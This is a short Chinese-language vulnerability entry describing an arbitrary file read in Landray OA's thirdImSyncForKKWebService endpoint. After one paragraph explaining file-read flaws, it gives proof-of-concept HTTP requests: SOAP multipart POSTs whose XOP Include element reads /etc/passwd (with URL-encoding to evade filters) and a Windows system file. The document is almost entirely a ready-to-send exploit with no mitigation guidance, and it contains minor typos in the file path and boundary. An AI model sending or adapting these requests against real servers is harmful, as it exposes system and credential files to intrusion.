漏洞描述
文件读取漏洞是指攻击者通过某种方式获取对系统文件的读取权限,从而访问敏感信息,如配置文件、源代码、用户数据等。这种漏洞通常是由于应用程序未正确实施权限控制或者未对用户输入进行充分过滤和验证导致的。
蓝凌OA thirdImSyncForKKWebService 任意文件读取漏洞
PoC代码
POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 633
Content-Type: multipart/related; boundary=aic4ddii0acc4ogaqgha
Accept-Encoding: gzip, deflate, br
--aic4ddii0acc4ogaqgha
Content-Disposition: form-data; name="message"
Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/%22 xmlns:web="http://webservice.kk.im.third.kmss.landray.com/%22> <soapenv:Header/> <soapenv:Body> <web:getTodo> <arg0> <otherCond>1</otherCond> <pageNo>1</pageNo> <rowSize>1</rowSize> <targets>1</targets> <type><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include%22 href="file:///e%74c%2fpa%73%73wd"/></type> </arg0> </web:getTodo> </soapenv:Body> </soapenv:Envelope>
--aic4ddii0acc4ogaqgha--
POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 632
Content-Type: multipart/related; boundary=aic4ddii0acc4ogaqgha
Accept-Encoding: gzip, deflate, br
--aic4ddii0acc4ogaqgha
Content-Disposition: form-data; name="message"
Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/%22 xmlns:web="http://webservice.kk.im.third.kmss.landray.com/%22> <soapenv:Header/> <soapenv:Body> <web:getTodo> <arg0> <otherCond>1</otherCond> <pageNo>1</pageNo> <rowSize>1</rowSize> <targets>1</targets> <type><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include%22 href="file:///c:windows/win.in"/></type> </arg0> </web:getTodo> </soapenv:Body> </soapenv:Envelope>
--aaic4ddii0acc4ogaqgha--